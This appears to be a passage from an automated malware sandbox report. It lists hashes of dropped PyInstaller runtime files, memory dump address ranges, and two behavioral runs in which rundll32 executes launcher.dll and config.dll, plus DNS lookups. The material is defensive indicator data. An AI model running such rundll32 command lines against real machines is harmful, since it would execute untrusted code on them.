SHA1 28b8d06135cd1f784ccabda39432cc83ba22daf7
SHA256 07d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72
SHA512 767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad

C:\Users\Admin\AppData\Local\Temp\_MEI13842\unicodedata.pyd

MD5 dfa1f0cd0ad295b31cb9dda2803bbd8c
SHA1 cc68460feae2ff4e9d85a72be58c8011cb318bc2
SHA256 46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10
SHA512 7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e

C:\Users\Admin\AppData\Local\Temp\_MEI13842\select.pyd

MD5 5c66bcf3cc3c364ecac7cf40ad28d8f0
SHA1 faf0848c231bf120dc9f749f726c807874d9d612
SHA256 26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc
SHA512 034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6

C:\Users\Admin\AppData\Local\Temp\_MEI13842\libcrypto-1_1.dll

MD5 e5aecaf59c67d6dd7c7979dfb49ed3b0
SHA1 b0a292065e1b3875f015277b90d183b875451450
SHA256 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1
SHA512 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

C:\Users\Admin\AppData\Local\Temp\_MEI13842\libffi-7.dll

MD5 6f818913fafe8e4df7fedc46131f201f
SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

C:\Users\Admin\AppData\Local\Temp\_MEI13842\base_library.zip

MD5 c4989bceb9e7e83078812c9532baeea7
SHA1 aafb66ebdb5edc327d7cb6632eb80742be1ad2eb
SHA256 a0f5c7f0bac1ea9dc86d60d20f903cc42cff3f21737426d69d47909fc28b6dcd
SHA512 fb6d431d0f2c8543af8df242337797f981d108755712ec6c134d451aa777d377df085b4046970cc5ac0991922ddf1f37445a51be1a63ef46b0d80841222fb671

memory/4652-81-0x00007FFFA84D0000-0x00007FFFA8936000-memory.dmp

memory/3340-86-0x0000000005030000-0x000000000504E000-memory.dmp

memory/3340-87-0x0000000006380000-0x00000000063CC000-memory.dmp

memory/2788-109-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/868-110-0x0000000003800000-0x0000000003C00000-memory.dmp

memory/2788-126-0x00007FFFBF400000-0x00007FFFBF40F000-memory.dmp

memory/868-135-0x0000000000610000-0x000000000067D000-memory.dmp

memory/3340-136-0x0000000073B20000-0x00000000742D0000-memory.dmp

memory/2788-137-0x00007FFFBF220000-0x00007FFFBF22D000-memory.dmp

memory/3340-139-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

memory/3340-141-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

memory/868-142-0x00000000768F0000-0x0000000076B05000-memory.dmp

memory/868-143-0x0000000003800000-0x0000000003C00000-memory.dmp

memory/1372-144-0x00000000003E0000-0x00000000003E9000-memory.dmp

memory/868-138-0x00007FFFC92D0000-0x00007FFFC94C5000-memory.dmp

memory/1372-146-0x0000000002240000-0x0000000002640000-memory.dmp

memory/1372-147-0x0000000002240000-0x0000000002640000-memory.dmp

memory/2788-133-0x00007FFFBB580000-0x00007FFFBB599000-memory.dmp

memory/2788-131-0x00007FFFBBAB0000-0x00007FFFBBAC8000-memory.dmp

memory/2788-130-0x00007FFFBBA80000-0x00007FFFBBAAC000-memory.dmp

memory/3340-149-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

memory/1372-151-0x0000000002240000-0x0000000002640000-memory.dmp

memory/1372-152-0x00000000768F0000-0x0000000076B05000-memory.dmp

memory/1372-148-0x00007FFFC92D0000-0x00007FFFC94C5000-memory.dmp

memory/2788-127-0x00007FFFBBAD0000-0x00007FFFBBAF4000-memory.dmp

memory/868-112-0x0000000003800000-0x0000000003C00000-memory.dmp

memory/868-114-0x0000000003800000-0x0000000003C00000-memory.dmp

memory/1372-153-0x0000000002240000-0x0000000002640000-memory.dmp

memory/3340-154-0x000000007EE90000-0x000000007EEA0000-memory.dmp

memory/3340-155-0x00000000072A0000-0x00000000072D2000-memory.dmp

memory/3340-156-0x0000000074450000-0x000000007449C000-memory.dmp

memory/3340-166-0x00000000068B0000-0x00000000068CE000-memory.dmp

memory/3340-167-0x00000000072E0000-0x0000000007383000-memory.dmp

memory/3340-168-0x0000000007C30000-0x00000000082AA000-memory.dmp

memory/3340-169-0x00000000075F0000-0x000000000760A000-memory.dmp

memory/3340-170-0x0000000007660000-0x000000000766A000-memory.dmp

memory/3340-171-0x0000000007880000-0x0000000007916000-memory.dmp

memory/3340-172-0x00000000077F0000-0x0000000007801000-memory.dmp

memory/3340-173-0x0000000007830000-0x000000000783E000-memory.dmp

memory/3340-174-0x0000000007840000-0x0000000007854000-memory.dmp

memory/3340-175-0x0000000007920000-0x000000000793A000-memory.dmp

memory/3340-176-0x0000000007870000-0x0000000007878000-memory.dmp

memory/3340-180-0x0000000073B20000-0x00000000742D0000-memory.dmp

memory/2788-179-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-181-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-182-0x00007FFFBBAD0000-0x00007FFFBBAF4000-memory.dmp

memory/2788-186-0x00007FFFBB580000-0x00007FFFBB599000-memory.dmp

memory/2788-188-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-195-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-202-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-209-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-216-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-223-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

memory/2788-230-0x00007FFFB2580000-0x00007FFFB29E6000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win10v2004-20240226-en

Max time kernel

94s

Max time network

98s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\launcher.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\launcher.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 145.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 152.33.115.104.in-addr.arpa udp
US 8.8.8.8:53 227.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win7-20240221-en

Max time kernel

122s

Max time network

128s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\config.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\config.dll,#1

Network

N/A

Files

N/A